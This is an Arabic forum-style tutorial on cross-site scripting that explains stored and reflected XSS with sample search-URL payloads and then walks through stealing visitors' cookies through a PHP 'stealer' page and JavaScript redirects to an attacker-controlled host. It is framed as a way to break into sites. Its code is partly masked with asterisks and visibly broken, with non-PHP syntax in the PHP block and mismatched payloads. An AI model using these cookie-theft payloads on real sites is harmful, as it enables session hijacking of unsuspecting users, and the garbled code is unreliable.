بسم الله الرحمن الرحيم
اليوم نتكلم عن ثغرات ( xss ) وبنتطرق لأهم الأشياء التي يتم استغلالها وتعاريف واشياء مفيده ...
ما هي ثغرات XSS وكيف يتم اختراق الموقع بواسطة هذه الثغره
ان المواقع المصابة بثغرات ( XSS ) هي المواقع التي تستطيع التعديل على محتوى مصدرها و ادخال احد الأكواد التالية :
اي ان ( XSS ) تعني امكانية تعديل محتويات الموقع ، ومعظم هذه الثغرات موجودة في مربعات البحث في المواقع ، وناخذ مثال على ذلك عنوان صفحة بحث في الموقع او في مربعات الكومنز او الرسائل او مربعات ادخال النصوص
كود PHP:
www.infectedsite.com/search.php?q=word
يكون الموقع قد كتب في صفح البحث جملة ( نتائج البحث لـ word ) , واذا ادخلنا سكربت جافا في خانة البحث كالتالي :
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word
ستكتب صفحة البحث نتائج البحث لـ ( ***************("XSS")</script>word )
هنا ادرجنا السكريبت في الصفحة و سوف يظهر مربع تنبيه في الصفحة ( XSS )
هذا يعني ان الموقع مصاب بثغرة ( XSS )
لماذا يكون الموقع مصابا بثغرة ( xss )
السبب هو لأن مبرمجي الموقع كسولين جدا لفلترة كلمة البحث من الرموز التالية :
وذلك لمنع إدخال الأكواد التالية :
هناك نوعين من ثغرات (xss )
( 1 ) اول نوع وهو النوع الدائم :
يكون هذا النوع غالبا في مربعات الكومنتز و التعليقات .
حيث في مربع التعليق على احد المواقع ، ندخل كود جافا سكريبت كالتالي :
كود PHP:
***************("XSS")</script>
سوف يحفظ التعليق في الصفحة أي سنحفظ كود الجافا سكريبت بشكل دائم بالصفحة
( 2 ) النوع المؤقت :
يكون النوع المؤقت غالبا في صفحات البحث حيث لا نستطيع ادراج الكود بشكل دائم و لكن نستطيع إدراجه فقط عن طريق رابط البحث كالتالي :
كود PHP:
http://www.infectedsite.com/search.php?q=***************("XSS")</script>word
كيف نستطيع اختراق الموقع عن طريق ثغرة ( xss )
هناك الكثير من الطرق لإختراق الموقع عن طريق ثغرات ( XSS ) ، وأهمها سرقة الكوكيز ، طبعا اكيد تحتاج الى استضافة موقع تدعم PHP , ننشئ صفحة PHP كالتالي :
تقوم هذه الصفحة بكتابة الكلمات التي تردها بطريقة ( GET ) الكود :
كود:
<?php
$data=$_GET["c"]
$f=open("*******.tct","w")
$f.write($data)
$f.close()
?>
هذه الصفحة سوف تكتب البيانات التي تردها الى ملف ( *******.txt ) والبيانات التي سنعطيها اياها هي الكوكيز عن طريق ادخال كود جافا سكريبت عن طريق الثغرة مثال في الثغرات المؤقتة في طريقة البحث :
كود PHP:
http://www.infectedsite.com/search.php?q=******************.location("http://ypursite.com/stealer.php?c="+********.******);</script>
هنا دمجنا السكريبت :
كود PHP:
******************.location("http://yoursite.com/stealer.php?c="+********.location)</script>
هذا الكود سيحول الضحية الى موقعك و يعطي الصفحة التي ستكتب الكووكيز قيم الكوكيز عن طريق الأمر :
هنا اذا فتحنا الملف
كود:
http://yoursite.com/*******.txt
ستجد الككيز للمستخدم مكتوبة فيها
اما في الثغرات الدائمة فيكفي ادخال الكود التالي :
كود PHP:
******************.location("http://yoursite.com/stealer.php?c="+********.location)</script>
وسبب إدخال الكود السابق لسرقة الكوكيز ، وايضا نستطيع في الثغرات الدائمة ان نحول متصفح الموقع المصاب بالثغرة ( XSS ) ،عن طريق سكريبت :
كود PHP:
********.location
هذا وصلى الله وسلم على صاحب الجبين الأزهر نبينا محمد وعلى آله وصحبه اجمعين
وعيدكم مبارك وكل سنة وانتوا بصحه وعافية
hojvr hd l,ru h, lkj]n lu eyvm ( xss )